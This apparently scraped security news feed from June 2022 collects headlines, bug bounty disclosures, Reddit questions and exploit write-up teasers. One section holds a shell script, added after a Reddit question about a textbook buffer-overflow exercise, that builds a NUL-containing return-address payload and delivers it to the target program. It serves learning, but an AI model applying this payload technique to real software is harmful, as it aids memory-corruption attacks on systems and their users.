    ICS security faces a severe challenge: 56 serious vulnerabilities sweep across OT devices
    Security researchers found 56 serious security vulnerabilities in products from 10 OT vendors; Forescout collectively refers to these 56 findings as "OT:ICEFALL".
    How to keep email communication with the FDA securely encrypted?
    This article is about how to keep email communication with the FDA securely encrypted.
    Cloudflare outage knocks hundreds of websites offline
    On June 21 (US Eastern Time), network infrastructure provider Cloudflare suffered an outage that caused widespread disruption to hundreds of websites.
    New DFSCoerce NTLM relay attack lets attackers take control of Windows domains
    Security experts have discovered a new Windows NTLM relay attack called DFSCoerce that allows attackers to take control of a Windows domain.
    Police bust phishing gang that caused millions of dollars in losses
    Following a law enforcement operation coordinated by Europol, members of a phishing gang that caused millions of euros in losses were arrested.
    CVE-2020-1472
    CVE-2020-1472 is a critical remote privilege escalation vulnerability in Windows domain controllers.
  • Open

    Semgrep rules for PHP security assessment
    submitted by /u/0xdea [link] [comments]
    ShoMon V2: Shodan Monitoring Integration for TheHive written in Golang
    submitted by /u/KaanSK [link] [comments]
  • Open

    A quick chat about 2 interesting recent vulnerabilities
    Author: heige@知道创宇404实验室 (Knownsec 404 Lab). Original link: https://mp.weixin.qq.com/s/-fHeQe-00ay7z5JXvvdK1w CVE-2022-22620 A few days ago the P0 blog published a new post, "An Autopsy on a Zombie In-the-Wild 0-day", an "archaeology" of the in-the-wild vulnerability CVE-2022-22620 disclosed in February 2022, which is quite inte...

  • Open

    Weak rate limit for SIGN.PLUS email verification
    Alohi disclosed a bug submitted by zeesozee: https://hackerone.com/reports/1584569
  • Open

    Do you know any good awareness blogs about malware and endpoint protection?
    Hello! Do you know any good awareness blogs/video/article about malware and endpoint protection? It should be to a user who is not familiar with cyber security. I found a lot of cool information about anti-phishing, but I need something more that focus on malware infection. submitted by /u/athanielx [link] [comments]
    SIEM Tools - AlienVault, possibly moving to Microsoft Sentinel
    Hi All, I've worked in AlienVault USM for 3 years now and do not love the SIEM feature or really anything about it. The company may be able to get Sentinel at a pretty fair price. Does anyone have experience with Sentinel or both tools? Or other recommendations for a "small" company with few security analysts. Healthcare Company size: 1,500 people Security Team: Very small, 2 people Thanks, submitted by /u/compguyguy [link] [comments]
    Pentesting DNS?
    I was assigned to do a “DNS pentest”. That’s what they call but I have no idea where to start with or what do I need to ask the Network team. Do I need some credentials or anything? Appreciate all the answers. submitted by /u/Puzzleheaded-Try5749 [link] [comments]
    Securing a private database
    I’m interested in understanding the common ways people secure their internal database for access by, for example, developers. Example one, for an on-premise database do you just use a vpn and local database users? Or do you connect the database to some sort of single sign on where possible? How would you audit this? Example two, For a private database in a public cloud how do you control connectivity? Do you use a vpn for that too or a bastion host or just security group settings (for AWS for example)? For both these examples, how would you scale tracking and managing users, credentials and authz (who’s allowed to do what) at scale? Thanks for any feedback. submitted by /u/cewdesign [link] [comments]
  • Open

    $1,500 XSS — what to consider during the bug bounty
    Hello folks, long time no see! I recently got my bounty from one of private programs on HackerOne and wanted to talked about it, share my… Continue reading on Medium »
    IDOR vulnerability
    1- What’s the IDOR? Continue reading on Medium »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    Hi Hackers! Welcome back to my new write-up. My name is Krishnadev P Melevila. I am a 20-Year-old Self-Learned Ethical Hacker. Continue reading on InfoSec Write-ups »
    I Found IDOR In Private Program Via API
    WHOAMI: Continue reading on Medium »
    Java Application -Server Side Template Injection
    Description: Continue reading on Medium »
  • Open

    War in Ukraine / June 20
    👉 Laws passed by the Verkhovna Rada of Ukraine during the 110 days of the war Continue reading on Medium »
  • Open

    Improving AI-based defenses to disrupt human-operated ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    Container escapes: Detecting abuses of Linux capabilities with Falco + Intro to CAP_SYS_ADMIN
    submitted by /u/capitangolo [link] [comments]
    A deep dive into Sigma rules and how to write your own threat detection rules
    submitted by /u/sciencestudent99 [link] [comments]
    Reverse Engineering an old Mario & Luigi game for fun
    submitted by /u/CyberMasterV [link] [comments]
    Intercepting MS Teams Communication
    submitted by /u/OwnPreparation3424 [link] [comments]
    When the CAS let you in - abusing misconfigured Actuator in Apereo CAS
    submitted by /u/qwerty0x41 [link] [comments]
    Does Acrobat Reader Unload Injection of Security Products?
    submitted by /u/woja111 [link] [comments]
  • Open

    SecWiki News 2022-06-21 Review
    No new news today~ For more of the latest articles, visit SecWiki
  • Open

    Infosec Weekly #2 — Docker, Google Dorks, Bug Bounty and other interesting Infosec stuff.
    No content preview
    What are supply chains and how to secure them
    What are Supply Chains Attacks Continue reading on InfoSec Write-ups »
    Telangana, Andhra Pradesh, Karnataka, Himachal Pradesh & Kerala — All Government bus services were…
    No content preview
    HacktheBox Writeup: Paper
    No content preview
    Kubernetes Security Policy Enforcement — OPA
    No content preview
    Google Dorks: An Advanced Hacking Tool
    No content preview
    Create a Hidden IRC Server with The Onion Router (TOR)
    No content preview
  • Open

    Notes from a real-world attack-and-defense exercise (initial foothold - EDR - intranet - lateral movement - vCenter)
    Not long ago I took part in an attack-and-defense exercise; the process was both simple and tortuous, and in the end lateral movement yielded access to the vCenter management console, successfully capturing the exercise target.
    Shunde Rural Commercial Bank's 2021 fintech talent recruitment is fully under way~~
    We sincerely invite you to write Shunde Rural Commercial Bank's digital future together!!
    FreeBuf Morning Report | Former Amazon employee convicted over data breach; Chrome extensions can be used to track users online
    A former Amazon employee has been convicted over a data breach.
    Frightening! Data of 1.5 million Flagstar Bank customers leaked
    The personal data of more than 1.5 million Flagstar Bank customers was accessed by hackers in a cyberattack last December.
    Microsoft issues emergency update to fix Microsoft 365 sign-in issue on ARM devices
    Microsoft recently released an out-of-band (OOB) Windows update.
    APT28 member charged with hacking NATO think tank
    A hacker has been charged with carrying out a cyber-espionage attack on the Joint Air Power Competence Centre, a NATO think tank located in Germany.
  • Open

    The complete bitdl.ir List
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Find out formatted or merged partitions
    Hello all, I have a laptop SSD drive with Windows. I took the drive, created an E01 file, decrypted it from BitLocker encryption and I want to know the history of the partitions. I tried to use volume shadow copies but they are all very recent. How can I tell if the partitions changed somehow? Thanks in advance. submitted by /u/tzichntzch [link] [comments]
    Convert Parallels image
    Hey guys, maybe someone of you can help me. I'm investigating an image of an older MacBook. There is a Win10 Parallels VM inside. Is it possible to extract an image of this VM? In the best case directly as .e01? I don't have a Mac myself so I can't use Parallels to convert the VM. The only way I discovered some evidence is by carving.. submitted by /u/kaibring [link] [comments]
    $8k tower budget
    Company recently gave me a 15k budget, 8k specific to a new PC. Does anyone have any recents forensic tower builds for under 8k used to process cell dumps and run analytics or custom build companies you recommend? Found a Dell Precision 7910 xeon e5 2698 v4 2.2 ghz, 20 core, 512 GB ddr4 that's under 6k but not excited about xeon. Looking for options and new accessories to build out the 15k. submitted by /u/WhoAteTheLastCookie [link] [comments]
  • Open

    What is Fuzzing? Why it is Important on Cybersecurity?
    What is Fuzzing? Why it is Important on Cybersecurity? Continue reading on Medium »
  • Open

    CVE-2022-1040: A journey through the Sophos Firewall service architecture and authentication bypass vulnerability analysis
    Author: 且听安全. Original link: https://mp.weixin.qq.com/s/c0X8Ct2I2SP-H_pioMM12Q Vulnerability information: Some time ago an authentication bypass vulnerability, CVE-2022-1040, was disclosed in Sophos Firewall; recently, while analyzing the Sophos service architecture in depth, I fully reproduced the vulnerability. The authentication bypass mainly exists in the User Portal and Webadmin interfaces, and the vulnerability cleverly exploits...
    CVE-2022-27925: Path traversal vulnerability in Zimbra Collaboration ultimately leads to RCE
    Author: 且听安全. Original link: https://mp.weixin.qq.com/s/2pUW4H1v6mnXtMqTlxZCMA Vulnerability information: Some time ago Zimbra officially reported an RCE vulnerability, CVE-2022-27925, and some folks discussed it on the vulnerability space station as well; last weekend I had time at home to finish analyzing and reproducing it. The principle is not complicated, but I ran into some pitfalls while setting up the environment, and the analysis process is shared below. From the description,...
    WebLogic CVE-2021-2294 JDBC deserialization vulnerability analysis
    Author: thiscodecc@墨云科技VLab Team. Original link: https://mp.weixin.qq.com/s/lUAkk9iI1yUBjy4l1eFYpg Vulnerability summary: On January 12, 2021, the Moyun Security V-Lab reported a WebLogic Server JDBC deserialization vulnerability to Oracle, and on April 21, 2021 Oracle published its acknowledgment. At the end of November 2019, Yang Zhang and others at...
  • Open

    Kryptos Support Write-up
    Hack The Box Cyber Apocalypse 2022 Continue reading on Medium »

  • Open

    Is it possible to get loader/dropper malware on iPhone?
    Specifically from the Apple App Store- can programs come packed with or download secondary malicious apps that are invisible to the user? Or is this impossible given the file system of the iPhone? submitted by /u/machine_funk [link] [comments]
    Is there any way to only present OTP when client side properties (IP address/useragent) changes
    Hey, While one idea was to have a list of trusted locations (public IP address) and trusted devices (user agent) and if the public ip address or devices associated with the username changed on the /login or /reset-password the user would be presented with an SMS OTP code forum. Why? Many of the web application users are seniors or technically inept users and management wants to lower the number of OTP codes being presented to the users (please note that the devices accessing these applications are stationary PCs) Any other way you'd go about doing this? Anything that can be unique for each client that can be gathered using JS? submitted by /u/RubaLion07 [link] [comments]
    Hey guys, hope you can help me with my CV
    This is my resume, hope you can help me and tell me what I'm missing. I keep applying to jobs but no answer, btw I'm taking my OSCP exam next week https://www.velvetjobs.com/resume/spkheh/ahmed-tahah submitted by /u/J0r3n3y [link] [comments]
    How to safely share passwords and other sensitive information in the company?
    What ways do you know to share sensitive information? For example to share a password to an FTP or API doc, or a private link, etc. I know this resource: https://onetimesecret.com/, but I'm not sure if it's safe. submitted by /u/athanielx [link] [comments]
    Looking for a book/course about gathering threat Intel
    I’ve come across many books in my search about the concept of threat Intel and how to use it. I’m currently looking for a book or course about how to gather threat intelligence data from the clear web and dark web Are there any recommendations? Thank you, submitted by /u/DoubleAgent10 [link] [comments]
    what skills to focus on for top dollar
    What niche or skills are most in demand that business are paying top dollar for. I dont want to be ok at everything as ive heard thats not good but should be an expert in a niche. I am taking sec+ test in a few days and would like to know what skills i should get next in order to be job ready. submitted by /u/Mufakinyanyo [link] [comments]
  • Open

    Hacking into the worldwide Jacuzzi SmartTub network
    submitted by /u/EatonZ [link] [comments]
    Zero Trust - A Layered Approach against threats
    submitted by /u/J_0_5 [link] [comments]
    semgrep rule pack by elttam - Java entry-points and security issues in Jackson, Spring Remoting, and Struts DMI
    submitted by /u/Gallus [link] [comments]
    Linux Threat Hunting: 'Syslogk' a kernel rootkit found under development in the wild
    submitted by /u/nykzhang [link] [comments]
  • Open

    Mix Content
    https://www.midian.appboxes.co/APPS1/ https://lockdown.madhouse.appboxes.co/Software/ https://lmao.lolxd.workers.dev/0:/ ​ Not sure if it has any NSFW content. submitted by /u/tempoguyx [link] [comments]
    Some audiobooks- there's a gud section on Terry Pratchett. I searched using "site:reddit.com/r/opendirectories/ drunkresearch" and got nothing so looks NEW!
    submitted by /u/ringofyre [link] [comments]
    text to speech audiobooks
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    War in Ukraine / June 17–19
    To capture Luhansk region till June 26 Continue reading on Medium »
    How to use GIS for Machine Learning
    In our 2 previous amazing articles : Continue reading on Preligens Stories »
    OSINT DOJO- Geolocation Challenge! 20 Jun 2022
    Usually the first thing I would do as a low hanging fruit is to just run the image through Tineye, Yandex and Google Image Search. Nothing… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-20 Review
    SecWiki Weekly (Issue 433) by ourren. For more of the latest articles, visit SecWiki
  • Open

    Authentication CSRF resulting in unauthorized account access on Krisp app
    Krisp disclosed a bug submitted by yassineaboukir: https://hackerone.com/reports/1267476 - Bounty: $1000
    Add more seats by paying less via PUT /v2/seats request manipulation
    Krisp disclosed a bug submitted by life__001: https://hackerone.com/reports/1446090 - Bounty: $500
    Admin Authentication Bypass Lead to Admin Account Takeover
    UPS VDP disclosed a bug submitted by 7odamo: https://hackerone.com/reports/1490470
  • Open

    Magnet axiom process error message
    Hi, I have come across this error message (process error - axiom process encountered an error while decrypting the evidence source) in Magnet AXIOM Process and can’t find anything that tells what’s wrong. This one occurs on the last step when I attempt to start and analyse the E01 file. I have also started the process with the same E01 file on another computer with less good hardware, and that one doesn’t get the error message and starts the process but gets stuck at 40% (when it analyses files and folders). The BitLocker key I’m using is also correct, tested to unlock it multiple times. Is there any clue on what this error message means and why it occurs? To add more, in FTK Imager I just saw I got this message: ATTENTION: The following sector(s) on the source drive could not be read: The contents of these sectors were replaced with zeros in the image. I have done three FTK Imager runs now and both end up the same. submitted by /u/Gackie [link] [comments]
    Booting an image from OSFClone
    Hi all, I have made an image of a system with OSFClone. This generated a file with no file extension. Now I want to boot a copy of the system in VMware Workstation but it only accepts .raw or .dd files. I can view the file in Autopsy. Does anyone know how to boot this image file? Thanks in advance! submitted by /u/ProAdmin007 [link] [comments]
  • Open

    Every XSS is different
    Today I’m going to talk about an XSS that I found on a public bugbounty program about a year ago, this program has multiple websites and… Continue reading on Medium »
    The mistakes of a novice
    Who is Soheil vanaee? Continue reading on Medium »
    How I found 5 CVEs in few days
    Hi all, Continue reading on Medium »
    Response Manipulation in the Admin panel lead to PII leakage
    Hi there, 7odamo is here. Today I will talk about How I was able to view all the customer reports on UPS Admin Panel Continue reading on System Weakness »
    Response Manipulation in the Admin panel lead to PII leakage
    Hi there, 7odamo is here. Today I will talk about How I was able to view all the customer reports on UPS Admin Panel Continue reading on Medium »
  • Open

    Finding client-side prototype pollution with DOM Invader
    Last year we made it significantly easier to find DOM XSS, when we introduced a brand new tool called DOM Invader. This year, we've improved DOM Invader to make finding CSPP (client-side prototype pol
  • Open

    FreeBuf Morning Report | US authorities say they have dismantled the RSOCKS botnet; decentralized finance hit hard by cybercrime
    US authorities, working with law enforcement agencies in Germany, the Netherlands and the UK, have successfully dismantled infrastructure linked to the Russian RSOCKS botnet.
    Google publishes "SOC Building Guide", offering new thinking on the future SOC
    Google discusses the direction for building the future automated SOC from the perspectives of the significance of SOC transformation, the definition of automated security operations, and concrete methods for achieving them.
    US Department of Justice successfully takes down the RSocks botnet
    Without victims' knowledge, the botnet compromised and hijacked millions of computers, smartphones and IoT devices worldwide for use as proxy servers.
    Siemens ICS users take note: 15 security vulnerabilities have been exposed
    There are 15 security vulnerabilities in the Siemens SINEC Network Management System (NMS) that attackers could chain together to achieve remote code execution on affected systems.
    DeadBolt ransomware strikes again; QNAP investigating
    QNAP recently detected a new DeadBolt ransomware campaign; according to current victim reports, the campaign appears to target NAS devices running QTS 4.x.

  • Open

    Account Takeover by OTP bypass
    Hey everyone! This bypass is a little bit interesting and you will get to learn a lot, hopefully. Continue reading on Medium »
    SQLI-Real-Victim
    Hello guys, in this tutorial I have a real victim in my article, and I do not really want to censor it because they act like idiots… Continue reading on Medium »
    How I found my first Bug using my android phone
    Hello there!! Continue reading on Medium »
    Bug Bounty Tips
    Okay, here I will share some tips from experience that may be quite useful for bug hunters; first I will explain what Postman is. Continue reading on Medium »
    How a broken link got me over €250
    Hey! This is Prath. I’m here to tell you about an old finding of mine, in which I found a broken link. Continue reading on Medium »
  • Open

    On-demand / online introductory courses / certifications in IT-Forensics ~ $500 USD?
    Hello, Just to be clear, I've read the FAQ here about "Which forensics certifications should I get?". I am (surprise surprise) an EU citizen, so I'm looking for an on-demand / online training course which is a prep for a certificate in IT forensics encompassing the basics, preferably without being geared towards a specific vendor (EnCase etc.). I am paying this out of pocket, so IACIS and SANS / GIAC certificates are too expensive; I was thinking about around $500 USD or so for both: * an online / on-demand course which would cover the exam * including an exam voucher. The ONLY alternative I've found is the EC-Council Digital Forensics Essentials, which for $199 covers an on-demand course and gives one attempt at the certification: EC-Council Computer Forensics Investigation Training | EC-Council iClass (eccouncil.org). Now, what I've read about CEH and CHFI isn't exactly stellar, and people's experience with EC-Council as a whole doesn't seem to be either (go figure). Does anyone have any other suggestions? I've already taken Network+ and Security+ and am thinking about taking the A+ just to have the CompTIA trifecta; other than that I have various Azure and AWS certificates. Other than A+, I was thinking about delving into Python, which seems both interesting and also worthwhile in the DFIR / IT forensics field. Linux+ from CompTIA is also on the roadmap. Thank you for your time and suggestions! submitted by /u/TheSwede86 [link] [comments]
    SANS FOR508 on Linux
    Hi all, Soon attending FOR508 and have an unanswered question. The prerequisites for the course state "Virtualization software on Windows/MacOS"; does anyone know any reason why it shouldn’t be OK to run it on top of Linux? submitted by /u/redditsecguy [link] [comments]
    any websites to track ips or view them when they click on the link?
    I'm looking for kind of a troll website that people can click on and have their IP address visit registered whenever they do it, so I can see them. The reason is that I'm being harassed by my ex-boyfriend and his girlfriend and I have no way to prove it, and I know a website that gives me the address with the IP but not the IP itself. Or, if I could pay one of you guys to make that website for me, if it is possible, how much would that cost? And show me, of course, a few of your previous works. I'd kindly appreciate it if you educate me a little bit on this topic. Thank you, Best regards. submitted by /u/Proper-Ad-1944 [link] [comments]
  • Open

    SecWiki News 2022-06-19 Review
    Collected resources on automating static analysis and code audit by ourren; Pwn mind map by ourren; How CodeQL databases are created by ourren; My front-end learning path by ourren; How one paper destroyed Bitcoin's anonymity by ourren; A first look at network isolation (air-gap) appliance products by ourren; How I manage my knowledge by ourren. For more recent articles, visit SecWiki
  • Open

    LDAP in Active Directory
    No content preview
  • Open

    Lists, indexes, series and other dangerous objects
    A week ago, after some second thoughts, I decided to tackle, on the Intelli|sfèra YouTube channel, the question of the… Continue reading on Medium »
    SPY NEWS: 2022 — Week 24
    Summary of the espionage-related news stories for the Week 24 (12–18 June) of 2022. Continue reading on Medium »
  • Open

    Authentication token and CSRF token bypass
    Enjin disclosed a bug submitted by whiteshadow201: https://hackerone.com/reports/998457 - Bounty: $300
    bypass forced password protection via circles app
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1406926 - Bounty: $100
  • Open

    New blog - NMAP and CME 101 stuff
    submitted by /u/Mr-R3b00t [link] [comments]
  • Open

    NSFW Pics few folders, few pics each.
    Small OD, Big Tits. https://bustygrls.com/pics/images/ BlakeLively Canucks Halloween KimKardashian LindsayLohan Masturbation NickiMinaj Rihanna RitaOra ScarlettJohansson Winter babes blowjobs booty celebs cleavage emo milf pro pussy titties tittyfuck voluptuous xmas. JPGs. Total wall clock time: 1m 13s Downloaded: 696 files, 36M in 5.6s (6.45 MB/s) submitted by /u/thats_dumberst [link] [comments]
  • Open

    FreeBuf Morning Report | Former Amazon engineer stole data on 100 million people; 80% of internet-connected TVs collect user data illegally
    Former Amazon software engineer Paige Thompson was charged with stealing data from Capital One in 2019 and faces up to 20 years in prison for wire fraud.
  • Open

    Is there an easy way to tell which Cisco devices can have smartinstall service?
    I’m teaching a class and thought about buying a Cisco device to demonstrate how to exploit the Smart Install service to get the hashes and crack them. But of course I’d buy an old used one on eBay, and I have no idea which devices SI can run on. Thanks submitted by /u/networkalchemy [link] [comments]

  • Open

    LoveTok — HackTheBox — Web Exploitation — Challenge — Writeup
    Hello guys I am back to posting another writeup. This is a web challenge. The challenge was created on 13th February 2021. It is a… Continue reading on Medium »
    Lesser Known Web Attacks: Server Side Injection
    Introduction Continue reading on Medium »
    OAuth Misconfiguration Leads To Pre-Account Takeover
    Hello, Continue reading on Medium »
    How I hacked one of the biggest airlines in the world
    Hello Bug Bounty community, this is my first write-up, about a bug that let me take over all accounts in a well-known airline in… Continue reading on Medium »
    My First Bug- Account Takeover
    Hi Amazing People, Hope you are all doing well. This is my very first article on my first ever bug that I found. So in case if you find… Continue reading on Medium »
    AlbusSec:- Penetration-List 011 API Vulnerabilities  — Sample
    Hi Information Security folk, I hope you liked my previous article that was on Cross-Origin-Resource-Sharing(CORS) Misconfiguration… Continue reading on Medium »
    How I found a No Rate Limit bug
    Hello everyone, Continue reading on Medium »
  • Open

    I made a website that can detect over 1000 extensions and shows you the percentage of users that share the same extensions.
    submitted by /u/z0ccc_z0ccc [link] [comments]
    Dangerous Repository of DoS, Red Teaming TTPs, and ICS Exploits
    submitted by /u/entropydaemon6 [link] [comments]
    Scheduled Scaling Up & Down Of EC2 Server
    submitted by /u/ajaidanial [link] [comments]
    I have created a Burp Suite extension which allows pentesters to keep track of each API and write test cases for individual APIs. Lastly, the extension allows mapping the vulnerable APIs to the list of vulnerabilities using a custom checklist.
    submitted by /u/Ano_F [link] [comments]
  • Open

    Clair – Vulnerability Static Analysis for Containers
    Article URL: https://github.com/quay/clair Comments URL: https://news.ycombinator.com/item?id=31793991 Points: 8 # Comments: 0
  • Open

    OSINTGRAM — Extract data from Instagram profiles
    OSINTGRAM is a tool written in python3 that makes it practical to extract a variety of data from a public Instagram profile… Continue reading on 100security »
    Life of a Minion
    If we look cautiously enough our social media has already been flooded with sock puppets, swaying our thoughts about a particular topic in… Continue reading on Medium »
    Instaloader — Instagram On Your Terminal
    Have you ever wanted to stop using Instagram, but couldn't because you will be missing your “friends” posts and stories. Use INSTALOADER. Continue reading on Medium »
  • Open

    I clicked on a phishing link on my Android phone and was redirected to 404 Not Found. Is my information at risk?
    So I got this link in a text message saying there had been an attempt to log into my Amazon account from another country and I needed to verify my account. I became rather scared and clicked on the link, but it led to a 404 Not Found page. Then I realized it was a scam and closed the site. I ran an antivirus scan and found nothing. From what I read on the internet, my understanding is that unless I give my personal info or install another app following the phishing link, I should be okay, because my device can't be harmed just by clicking on a link, as Android apps are sandboxed and one app can't get info from another app. However, what I don't understand is, why would scammers put up a 404 Not Found page if they want any information? Does it not defeat the purpose? How can anyone enter info on a dead page? Apparently Microsoft already warned about this type of 404 Not Found phishing link. Is it the case that it is a custom 404 page that's not supposed to look dead? My page looked very dead. I'm rather confused. submitted by /u/Lame_Buddha [link] [comments]
  • Open

    Broken access control
    UPS VDP disclosed a bug submitted by nayefhamouda: https://hackerone.com/reports/1539426
  • Open

    SecWiki News 2022-06-18 Review
    No news updates yet today. For more recent articles, visit SecWiki
  • Open

    X (2022) — Movie Review
    X (2022) is a slasher horror thriller from Ti West and is set in the late 1970s Texas where an adult film crew decides to take up the… Continue reading on Medium »
  • Open

    Interpretation and impact analysis of the BIS "Information Security Controls: Cybersecurity Items" rule
    This article is mainly an interpretation of the "Information Securi … rule published by the Bureau of Industry and Security (BIS) of the US Department of Commerce on 26 May 2022. Continue reading Interpretation and impact analysis of the BIS "Information Security Controls: Cybersecurity Items" rule →
  • Open

    Handling null bytes for buffer overflows
    Hello, I am reading the book Hacking: The Art of Exploitation and trying to perform a buffer overflow. The command that is used is reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10') But on my machine I have a null byte (\x00\x00\x07\xe1), therefore it does not handle this well and omits my null bytes. I tried using piping, even trying to play with the source code of the shell, but it does not work... Do you have any ideas how I can overcome this issue? When doing printf "\xe1\x07\x00\x00" | hd I am managing to pipe the null byte (without command substitution I am managing to pipe the null bytes; thinking somehow to use this way). Edited: It also works when writing into a file; I do see the null bytes when doing: hd < args But the stdin is not redirected :( When doing ./myExe < args it still sees < as an argument (so doing certain manipulations with gdb that I saw on the internet, i.e. https://stackoverflow.com/questions/2953658/gdb-trouble-with-stdin-redirection) submitted by /u/MrsSergeivna [link] [comments]
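    The problem in the post comes down to where the bytes travel. The following is an added example written for this page, not code from the post or from the book: it shows, in POSIX shell, that the little-endian form of the poster's address (bytes e1 07 00 00) survives in a file but not in command substitution, and it builds the payload file the way the book's perl "x10" repeats the address. The target name auth_overflow2 and the file name args are taken from the post; the function names, the use of octal escapes (dash's printf has no \xNN) and the gdb invocation are my own choices.

```shell
#!/bin/sh
# Added example (not from the post or the book). Shows where NUL bytes
# survive on the way to a target program.
#
# The poster's return address 0x000007e1 written little-endian, as the
# bytes e1 07 00 00. Octal escapes are used because dash's printf does
# not understand \xNN; bash accepts both.
ADDR='\341\007\000\000'

# Bytes that survive command substitution. The shell turns $(...) into a
# C string, so every NUL is dropped (bash warns "ignored null byte");
# only 2 of the 4 bytes are left. Any argv[] entry has the same limit,
# because execve() passes arguments as NUL-terminated strings.
bytes_via_subst() {
    printf '%s' "$(printf "$ADDR")" | wc -c | tr -d ' '
}

# Bytes that survive when the payload is written to a file: all 4,
# because a file holds raw bytes, not a C string.
bytes_via_file() {
    f=$(mktemp)
    printf "$ADDR" > "$f"
    n=$(wc -c < "$f" | tr -d ' ')
    rm -f "$f"
    printf '%s' "$n"
}

# Build the payload file: the address repeated 10 times, mirroring the
# book's perl 'print "..." x10'. Prints the resulting size (40 bytes).
build_payload_file() {
    out=$1
    : > "$out"
    i=0
    while [ "$i" -lt 10 ]; do
        printf "$ADDR" >> "$out"
        i=$((i + 1))
    done
    wc -c < "$out" | tr -d ' '
}

# Delivery (assumed target path and file name, taken from the post):
#   build_payload_file args
#   ./auth_overflow2 < args                    # NULs reach stdin intact
#   gdb -q ./auth_overflow2 -ex 'run < args'   # same redirection inside gdb
# This only helps if the program reads its input from stdin. A program
# that takes its input from argv[1] can never receive a NUL byte from any
# shell; then the fix is an address without 0x00 bytes or another input
# channel (for example a file or an environment variable the program reads).
```

    The caveat in the last comment is the part worth remembering: no amount of quoting, piping or `$(...)` tricks will put a NUL into argv, because the kernel receives the arguments as C strings. Redirecting a file into stdin (or `run < args` inside gdb) delivers the bytes intact, but only to a program that actually reads stdin.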
  • Open

    Giving Red Team Ops certs to women and LGBTQIA+ for Pride Month!
    submitted by /u/VVX7 [link] [comments]

  • Open

    CSRF leads to account takeover in Yahoo!
    submitted by /u/vinay737 [link] [comments]
    Analyzing the latest version of Matanbuchus
    submitted by /u/OwnPreparation3424 [link] [comments]
    Securing OT Network Management Systems: Siemens SINEC NMS
    submitted by /u/derp6996 [link] [comments]
    AWS Lambda Command Injection
    submitted by /u/lormayna [link] [comments]
    BRATA is evolving into an APT | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
  • Open

    [Security Advisory] Remote code execution in multiple Cisco Small Business routers...
    Cisco recently published a security advisory fixing multiple vulnerabilities in several of its small business routers. The web-based management interface of the Cisco Small Business RV110W, RV130, RV130W and RV215W routers contains vulnerabilities that could...
  • Open

    The 2022 attack-and-defense exercise practice guide everyone is sharing in the enterprise security groups: we finally got it!
    Guide in hand, high score in the bag!
    CVE-2021-31760 Webmin cross-site request forgery vulnerability
    A textbook case of CSRF where a single click gets the attacker a beacon.
    Internal network pentesting | Forward proxies and configuring nginx as a reverse proxy, explained
    I never fully understood how nginx implements a reverse proxy; this is a summary.
    Analysis of the "demonic" vulnerability in the MetaMask browser extension wallet
    If you need help detecting the demonic vulnerability, contact the SlowMist security team.
    Unpatched Microsoft Exchange servers under attack by BlackCat ransomware
    Microsoft warned that the BlackCat ransomware is exploiting vulnerabilities in unpatched Exchange servers to gain access to target networks.
    SAST, an essential software security technique, in one article
    Static application security testing, also called static analysis, finds security vulnerabilities by examining an application's source code directly, so that the business avoids losses.
    FreeBuf Weekly | Ukraine moves critical data to neighboring NATO countries; US holds the 2022 Cyber Shield exercise
    The US held the 2022 "Cyber Shield" exercise.
    Researchers find new IceXLoader 3.0 version written in Nim
    Researchers recently found that the latest IceXLoader 3.0 is written in Nim, a language attackers have been experimenting with in attacks over the past two years.
    Attacks by the new BumbleBee loader increase; used by ransomware gangs
    Researchers observed recent BumbleBee activity, with a marked increase in the number of servers and several updated and improved versions.
    How to keep the browser from becoming the attacker's "entry point" in attack-and-defense exercises | FreeBuf enterprise-side group discussion
    Which browser security requirements matter most to you? Is there a way to balance browser security, usability and compatibility?
    "Dark Elephant" (暗象) group: a decade of hidden cyber attacks
    The group's main technique is sending highly deceptive spear-phishing emails from Gmail/Yahoo accounts or from stolen mailboxes.
    iCloud hacker sentenced to 9 years for stealing nude photos
    A man admitted to breaking into thousands of Apple iCloud accounts and stealing large numbers of victims' nude photos and videos.
    Bypassing and exploiting storage bucket upload policies and signed URLs
    This article contains some of my own humble views; readers with questions or other ideas are welcome to discuss in the comments.
    Threat actors abuse an Office 365 feature to launch ransomware attacks on enterprises
    Threat actors could hijack Office 365 accounts and encrypt files stored in SharePoint and OneDrive to extort a ransom.
  • Open

    Hacking a NFT Marketplace
    Background: Continue reading on Medium »
    CRLF injection scanner
    The most powerful CRLF injection (HTTP Response Splitting) scanner. CRLFsuite — CRLF injection scanner Continue reading on Medium »
    Fuzzing With Custom Wordlists
    Hello Hackers Continue reading on Medium »
  • Open

    Automating Cobalt Strike with Python
    TL;DR I have expanded the payload_automation Python libraries to allow for synchronously controlling actions in a Cobalt Strike Beacon by adding the Beacon class. This enables you to script out Cobalt Strike actions purely in Python and avoid coding anything in Sleep completely (at least for things I’ve already implemented).  One important fact to take note of is that the actions happen synchronously. Those who have worked in Sleep/Aggressor know that it’s a fire and forget language in most cases, so waiting until an action is completed or adding logic based on the results of an action is notoriously difficult to accomplish. With this library, we can synchronize the actions and in most cases, easily capture the output of a specific action in Python and perform actions based on that output…
  • Open

    sql injection via https://setup.p2p.ihost.com/
    IBM disclosed a bug submitted by exploitmsf: https://hackerone.com/reports/1567516
    CSRF Bypassed on Logout Endpoint
    Enjin disclosed a bug submitted by er_salil: https://hackerone.com/reports/1091403
    Race condition via project team member invitation system.
    Enjin disclosed a bug submitted by akashhamal0x01: https://hackerone.com/reports/1108291 - Bounty: $60
  • Open

    War in Ukraine / June 16
    Ukraine can get the status of a candidate for EU membership in a week Continue reading on Medium »
    From office clerk to citizen journalist: this is the story of Bellingcat
    While most people use social media mainly for entertainment and keeping in touch, Eliot Higgins uses it for something quite… Continue reading on Journalistiek Ede Kijk-luister-leeslijst »
    OhSINT — TryHackMe WriteUp
    Open Source Intelligence (OSINT) is a sub-type of threat intelligence that is only gathered from free, public sources. Continue reading on Medium »
  • Open

    Vulnerabilities in JS based Applications
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-06-17 Review
    VED (Vault Exploit Defense): open source implementation by ourren; My story with SRCs by ourren; "Dark Elephant" (暗象) group: a decade of hidden cyber attacks by ourren. For more recent articles, visit SecWiki
  • Open

